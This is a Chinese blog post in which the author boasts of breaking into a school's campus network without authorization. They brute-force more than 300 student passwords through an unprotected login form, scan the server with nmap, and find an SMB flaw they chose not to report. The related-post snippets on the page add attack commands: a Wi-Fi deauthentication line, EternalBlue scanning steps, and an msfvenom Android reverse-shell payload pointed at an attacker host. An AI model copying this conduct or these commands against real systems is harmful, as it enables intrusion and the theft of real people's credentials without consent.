入侵某学校校园网过程

已于 2022-02-04 21:15:00 修改
阅读量3.3w 收藏 342
点赞数 66
分类专栏: 0day漏洞(edu漏洞)挖掘案例分享 文章标签: 安全 信息安全 web
于 2020-05-28 16:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/106407538
版权

校园网一直被喷垃圾
因此一直也没开过校园网,一直都是手机热点续命,也正是因为这个,电脑打开wifi连接的时候,一不小心就跳转到了校园网连接界面去了,又因为本来自己的浏览器就挂了代理的
登录界面如下
在这里插入图片描述
于是正常的用burp抓了下网页的包
发现密文这些都没有任何的加密,类似于这个,密文直接没有任何的加密,还没有验证码机制
在这里插入图片描述
于是习惯性的用burp的攻击模块跑了下包,爆破了一些密码出来,跑了几个小时应该随便弄出来300多个吧(涉及到隐私因此疯狂打码)
在这里插入图片描述
你以为这样我就满足了?
不可能这样的,作为一个渗透手,要么就别玩,要玩的话就挖到底

于是果断去kali里面用namp扫描这个服务器开发的端口
扫描出来开放的一大堆,21,22,445,85端口,(于是心里一惊,这个服务器的安全做的真是好烂)
于是去了msfconsole查找了下自己习惯的端口445
发觉具有漏洞,然后玩到这里也不想玩了,毕竟我可是个好人,攻击嘛还是算了
(具体是什么漏洞这里就不公布了,防止被查水表,而且这个漏洞也没提交,因为感觉提交了,到时候背个处分就狗了)

总结:校园网的安全做的是真的烂,别人的隐私是有多容易就弄到手

goddemon
关注
  • 66
    点赞
  • 342
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 18
    评论
专栏目录
订阅专栏
记我一次成功的入侵学校网站服务器的黑客行动
诗歌年华
12-22 1万+
实战入侵校园实验平台
qq_42383069的博客
11-24 6877
目标机:172.18.206.87(学校内网) 网址:www.manage.vslab… 9.26号和老师谈论了仿真实验网站的安全性,经过老师的允许,我开始有了寻找漏洞的想法。 寻寻觅觅,一时间来到了10月中旬, 首先看到它有上传功能,便想到了上传一句话木马,从响应头看到它是jsp写的,然后上传jsp大马,抓包改后缀,但是,没有返回路径????真的难受啊,折腾了好几天,最终,放弃吧…(后来我发现原...
巴扎嘿的小研究-kali进行wifi爆破及钓鱼_kali wifi killer
2301_78416732的博客
04-20 953
aireplay-ng -0 50 -a 22:26:66:18:CB:E0 -c B0:3C:DC:B9:06:FE wlan0mon 第一个-a是wifi的bssid,第二个-c是抓包时第二行的station,可以理解为用户id。然后我就断网了哈哈哈哈,好好玩!./fluxion.sh -i 然后首次打开需要下载依赖包,推荐中科大和清华的源,这样依赖包就都可以下载好(我是先用的中科大的源然后还剩xterm和pykit俩包是missing的,然后改用清华的源就ok了)
Kali Linux 暴力破解学校办公室WiFi 总结
m0_58837469的博客
04-06 1万+
脑子里最开始萌生出这个想法的起因是在闲逛博客的时候看见的一篇kali Linux网络渗透的一篇文章。我决定把对面办公室的网络破解了。(刚入门计算机这个专业的黑客梦) 电脑装VMware、kali Linux、准备一块网卡(网卡要兼容kali Linux、我用的是RT3070L)、能敲键盘的手(脚也行) 装网卡(RT3070L)时出现的问题:虚拟机识别不了。必须要让虚拟机单练网卡才可以解决 Ctrl+shift+T 打开终端——> sudo su 输入密码 获取 root 权限—...
kali系统渗透window实现屏幕监控
热门推荐
鸣风
12-23 1万+
kali系统渗透window实现屏幕监控
kali metsploit 工具入侵windows
qq_41743240的博客
02-24 8225
入侵漏洞:ms17_010 请勿用于非法用途 第一步: 发现存活主机 nmap -sn 192.168.1.0/24 第二步: 扫描漏洞 nmap -T4 --script vuln 192.168.0.107 扫描到漏洞smb-vuln-ms17-010(永恒之蓝) 第三步: 打开metasploit msfconsole 第四步: 查找...
kali安装配置snort实现简单的入侵检测
阿渌的博客札记
11-28 7254
kali安装配置snort实现简单的入侵检测 参考 kali上安装配置snort以及简单实验(这篇是我安装过程中最为简洁的,也是错误较少的); Ubuntu 16.04安装snort含问题解决(示例代码)(这篇里面包含常见错误,虽然我出现的错误并没有解决); 前言 snort这个东西真的是魔鬼,前前后后在四个系统上安装了不知道多少次,最后终于在搭载了Ubuntu18的云服务器勉强安装完成。 安装失败的主要原因 网络不顺畅(这个也是以下很多原因出现的主要原因); 依赖环境安装不全; 配置失败的主要原因
如何通过计算机侵入学校网络,如何进行局域网入侵
weixin_39786341的博客
06-21 7653
局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能,那么如何进行局域网入侵呢?今天就来和大家一起看看局域网入侵方法。入侵局域网电脑方法一1、 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 ...
某中学校园网络建设工程设计建议.doc
07-12
校园网学校内部的信息基础设施,用于连接教学楼、行政楼、图书馆、实验室等各个区域,提供网络教学、资源共享、行政办公、学生学习与生活等多方面服务。它不仅促进教育现代化,还为学校管理和科研活动提供了便利。...
CS西电高悦计网课设-校园网设计
最新发布
06-26
校园网设计——构建高效智能的信息交流平台》 在当今信息化时代,校园网设计成为教育机构不可或缺的一部分。它不仅服务于教学、科研,还为师生提供便捷的生活服务,是连接校园内外的重要桥梁。"CS西电高悦计网...
校园网络规划设计方案.docx
12-25
校园网络规划设计方案 某校园网络规划设计方案全文共5页,当前为第1页。[摘要] 计算机网络安全建设是涉及我国经济发展、社会发展和国家安全的重大问题。本文结合网络安全建设的全面信息,在对网络系统详细的需求...
局域网入侵
03-15
菜鸟学习局域网入侵!入门技术应用,适合所有新手。
网络实习报告-校园网设计方案.docx
01-03
校园网设计方案 网络现状 建设学院千兆校园网,完成一个整体规划、分步实施、充分考虑现有设备与实际资金情况的方案,建立网络中心和...6. 校园网与Internet相连后具有“防火墙”过滤功能,以防止网络黑客入侵网络系统
bys.rar_校园网_校园网规划
09-24
校园网规划时还需考虑网络安全,包括防火墙设置、入侵检测系统、病毒防护策略,以及用户权限管理,确保敏感信息不被非法访问。同时,数据备份和恢复机制也是不可或缺的,以防止数据丢失。 此外,校园网的运维和服务...
使用无线信号特性,查找和终结快捷宾馆中摄像头的一种方法 (无线安全?一点都不安全 开篇)
lixiangminghate的专栏
12-14 2018
各位在快捷宾馆住宿时有没有遇到或者担心遇到什么糟心事?被针孔摄像头偷拍算不算一件很糟心的事?本文提出一种方法来应对这种情况。 针孔摄像头拍摄后势必会通过网络将视屏传送给安装者。由于针孔摄像头的隐蔽性,摄像头不会使用有线网络,剩下的选项就是无线网络了。无线网络有2种选项:a.插入SIM卡,通过4G网络传输;b.使用快捷酒店会提供的WIFI。选项b的投入比选项a小,而且便于集成,另外...
kali常用的扫描方式
qq_42877870的博客
03-22 3387
1.基于 Nmap 的扫描方式 Nmap,也就是 Network Mapper,最早是 Linux 下的网络扫描和嗅探工具包。 nmap -sS xxxx(ip) #其中sS为半连接,这样更安全 nmap -sS xxxx(ip) -p xxx(端口) #可以接多个端口 2.NC扫描 nc 是 netcat 的简写,有着网络界的瑞士军函美誉。因为它短小精悍、功能实用,被设计为一个简单、 可...
远程连接解决kali添加新用户无法显示路径问题及提权
Matrixap11的博客
11-17 389
kali2来渗透我们学校校园网,因为不想在kali系统里面进行操作,就想用Xshell来远程登录kali,结果很难受----在Xshell端直接用root用户登录,很无奈,kali不给我权限,建个用户,在Xshell端显示有问题: (使用Xshell连接要保证开启ssh的22号端口: #开启端口 #systemctl start ssh #查看端口状态 systemctl status ss...
kali入侵Android实验
weixin_42727740的博客
06-05 5128
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址(攻击机) LPORT= 4444 R> apk.apk(生成apk的路径及包名) android的安装包需要签名才能安装到android上,所以要先创建密钥库然后进行签名 keytool -genkey -v -keystore my-release-key.Keystore -a...
渗透过程中可能要用到的Kali工具小总结
weixin_50464560的博客
08-03 2600
渗透过程中可能要用到的Kali工具小总结 写在最前面 最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的 所以写一个渗透过程中可能用到的kali渗透工具的小小总结 写的不对 多多包涵 各位大佬轻喷 :D Kali用得好 牢饭准管饱 渗透不规范 亲人两行泪 先来了解一下Kali(From Wikipdeia) Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Of...
校园网入侵攻击与其他网的区别
06-10
校园网入侵攻击与其他网的区别主要在于攻击的目标和攻击方式上。 首先,校园网入侵攻击主要针对学校内部的网络系统和数据,而其他网的入侵攻击则可能针对企业、政府机关等其他组织的网络系统和数据。由于学校的网络系统和数据相对较为简单,攻击者通常可以比较容易地找到漏洞并进行攻击。 其次,校园网入侵攻击方式与其他网的入侵攻击方式也存在一定的区别。校园网入侵攻击可能包括一些常见的攻击方式,如DDoS攻击、SQL注入攻击、木马病毒攻击等。但是,由于学校内部的网络系统和数据相对简单,攻击者也可能采取一些更加简单粗暴的攻击方式,如弱口令攻击、社会工程学攻击等。 总的来说,校园网入侵攻击与其他网的入侵攻击存在一些共性,但也存在一定的区别。为了保障校园网安全学校需要采取一系列的安全措施,如加强网络安全意识教育、加强网络安全管理、加强网络安全技术防范等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值